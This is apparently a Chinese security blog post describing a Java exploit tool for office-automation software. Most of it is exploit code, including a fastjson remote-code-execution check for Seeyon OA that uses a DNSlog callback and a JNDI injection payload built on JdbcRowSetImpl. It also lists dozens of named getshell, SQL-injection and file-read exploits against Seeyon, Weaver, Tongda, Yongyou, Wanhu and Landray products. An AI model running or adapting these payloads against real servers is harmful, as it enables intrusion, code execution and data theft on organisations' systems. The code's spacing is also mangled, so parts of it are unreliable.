publicboolean VULcheck(Stringurl) throwsException {this.target= url;String path = url +VULURL;//获取dnslogdomianString dnslog =DnslogDomain();if(dnslog.equals("请检查网络")){this.isVul= false;}else{try{Map<String,String> Headers =new HashMap<String,String>();Headers.put("Content-Type","application/x-www-form-urlencoded");Headers.put("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131Safari/537.36");Headers.put("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");Headers.put("Connection","close");String data ="_json_params={"@type":"java.net.Inet4Address","val":""+ dnslog.split(",")[1]+ ""}";String data2 ="_json_params={"%40type":"java\x2enet\x2eInet4Address","val":""+ dnslog.split(",")[1]+ ""}";HttpRequest result =HttpRequest.post(path).headers(Headers).send(data).followRedirects(false).readTimeout(5000);HttpRequest result2 =HttpRequest.post(path).headers(Headers).send(data2).followRedirects(false).readTimeout(5000);String ress =result.body();String ress2 =result2.body();System.out.println(ress);System.out.println(ress2);//获取dnslog记录String getrecords =DnslogRecords(dnslog.split(",")[0]);if(getrecords.contains(dnslog.split(",")[1])){this.isVul= true;}return this.isVul;} catch(Exception e){System.out.println(e);throw e;}}return this.isVul;}
publicString Vulexp(Stringurl,String cmd,String encoding) throwsException {this.target= url;String path = this.target+ VULURL;//获取dnslogdomianString dnslog =DnslogDomain();System.out.println(dnslog);if(dnslog.equals("请检查网络")){this.isVul= false;}else{try{Map<String,String>Headers=newHashMap<String,String>();Headers.put("Content-Type","application/x-www-form-urlencoded");Headers.put("User-Agent","Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/92.0.4515.131 Safari/537.36");Headers.put("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");Headers.put("Connection","close");String data ="_json_params={"@type":"java.net.Inet4Address","val":""+ dnslog.split(",")[1]+ ""}";String data2 ="_json_params={"%40type":"java\x2enet\x2eInet4Address","val":""+ dnslog.split(",")[1]+ ""}";HttpRequest result =HttpRequest.post(path).headers(Headers).send(data).followRedirects(false).readTimeout(5000);HttpRequest result2 =HttpRequest.post(path).headers(Headers).send(data2).followRedirects(false).readTimeout(5000);String ress =result.body();String ress2 =result2.body();System.out.println(ress);System.out.println(ress2);//获取dnslog记录String getrecords =DnslogRecords(dnslog.split(",")[0]);String dnsdomain = "原始dnsdomain_host:" +dnslog.split(",")[1];String dnsrecords ="结果dnsrecords_value:" +getrecords;if(getrecords.contains(dnslog.split(",")[1])){returnpath + "存在致远OAfastjson rce n"+ dnsdomain +"n"+dnsrecords;}return path +"不存在致远OAfastjson rce n"+ dnsdomain +"n"+dnsrecords;} catch(Exception e){System.out.println(e);throw e;}}return path +"请检查网络";}
if(OA.contains("SeeyonOA_Fastjson_ChangeLocale_Rce")){exp =newSeeyonOA_Fastjson_ChangeLocale_Rce();this.exp= Tools.getExploit(cve);try {if(this.exp.VULcheck(url)){//String result = this.exp.Response(url);this.basic_info.appendText(url+ " 存在" + cve +"漏洞rn"+"-----------检测完毕-----------"+"rn");} else{this.basic_info.appendText(url+ " 不存在" + cve +"漏洞rn"+"-----------检测完毕-----------"+"rn");}} catch(Exception e){this.basic_info.appendText("检测异常rn"+e.toString()+"n-----------检测完毕-----------"+"rn");}}jndiExec利用:public StringjndiExec(String url,String jndi,String echo,String encoding) throwsException {this.target = url;Stringpath = this.target + VULURL;//获取dnslogdomiantry {Map<String,String>Headers=new HashMap<String,String>();Headers.put("Content-Type","application/x-www-form-urlencoded");Headers.put("User-Agent","Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/92.0.4515.131 Safari/537.36"); Headers.put("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");Headers.put("cmd",echo);Headers.put("Content-Length","243");String data ="_json_params={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":""+jndi+"","autoCommit":true}}";String data2 ="_json_params={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":""+jndi+"","autoCommit":"true"}}";HttpRequest result =HttpRequest.post(path).headers(Headers).send(data).followRedirects(false).readTimeout(5000);HttpRequest result2 =HttpRequest.post(path).headers(Headers).send(data2).followRedirects(false).readTimeout(5000);String ress = result.body();String ress2= result2.body();int resp = result.code();int resp2 = result2.code();if(resp==200 ||resp2==200){return path + "存在致远OAfastjson rce npoc1回显:n" +ress +"npoc2回显:n"+ress2;}return path + "不存在致远OAfastjson rce npoc1回显:n" +ress +"npoc2回显:n"+ress2;} catch (Exception e) {System.out.println(e);throw e;}}
1、SeeyonOA_Session_Divulge_Upload_Getshell2、SeeyonOA_Fastjson_SursenServlet_Rce3、SeeyonOA_Fastjson_ChangeLocale_Rce4、SeeyonOA_ajaxAction_Upload_GetShell5、SeeyonOA_A8_Htmlofficeservlet_Rce6、SeeyonOA_A6_InitDataAssess_Divulge7、SeeyonOA_A6_Setextno_Sqlinjection8、SeeyonOA_A6_DownExcelBeanServlet9、SeeyonOA_A6_CreateMysql_Divulge10、SeeyonOA_GetSessionList_Divulge11、SeeyonOA_Webmail_FileDownLoad12、SeeyonOA_Session_Divulge13、SeeyonOA_A8_Information
泛微
1、WeaverOA_E_Cology_getSqlData_SqInjection2、WeaverOA_E_Cology_LoginSSO_Sqlinjection3、WeaverOA_E_cology_WorkflowServiceXml_Rce4、WeaverOA_Weaver_common_Ctrl_FileUpload5、WeaverOA_E_Office_Upload_Getshell6、WeaverOA_E_Cology_DBconfigReader7、WeaverOA_Mysql_config_Information8、WeaverOA_E_Bridge_任意文件读取9、WeaverOA_V9_Upload_Getshell10、WeaverOA_E_Mobile_Ongl_Rce11、WeaverOA_V8_Sqlinjection12、WeaverOA_BshServlet_Rce
1、TongdaOA_Attachment_remark_FileInclude2、TongdaOA_Management_Upload_Getshell3、TongdaOA_Delete_Authincphp_Getshell4、TongdaOA_Api_Ali_Upload_Getshell5、TongdaOA_Ispirit_Upload_Getshell6、TongdaOA_Report_Bi_Sqlnjection7、TongdaOA_Swfupload_Sqlnjection8、TongdaOA_File_Include_Getshell9、TongdaOA_Get_Contactlist10、TongdaOA_AnyUser_Login
用友
1、Yongyon_BshServlet_DatabaseDecode2、YongYou_NCCloudFS_Sqlinjection3、YongYou_ERP_NC_DirTraversal4、YongYou_U8_Rce_Sqlinjection5、Yongyon_U8_getSessionList6、YongYou_NC_Uapws_XXE7、YongYou_U8_Sqlinjection8、Yongyon_EF_DirTraversal9、YongYou_BshServlet_Rce
万户
1、WanhuOA_FileUpload_Controller_Getshell2、WanhuOA_showResult_Sqlinjection3、WanhuOA_Download_http_Filedown4、WanhuOA_Download_old_Filedown5、WanhuOA_Download_ftp_Filedown6、WanhuOA_smartUpload_Getshell
蓝凌
1、LandrayOA_Custom_SSRF_JNDI2、LandrayOA_sysSearchMain_Rce3、LandrayOA_Custom_FileRead
http://wiki.peiqi.tech/wiki/oa/https://github.com/f0ng/poc2jarhttps://github.com/xinyu2428/TDOA_RCEhttps://github.com/yhy0/ExpDemo-JavaFXhttps://www.cnblogs.com/fsqsec/p/5501657.html
记一次卑微的渗透测试
pwn入门之栈入门
MYSQL另类利用方式
注意:⚠️
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns个人简书:https://www.jianshu.com/u/bf0e38a8d400个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html个人博客园:https://www.cnblogs.com/thelostworld/FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article语雀博客主页:https://www.yuque.com/thelostworld
欢迎关注公众号:
原文始发于微信公众号(thelostworld):Java_OAexp工具设计及实现 | Thelostworld_OA
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论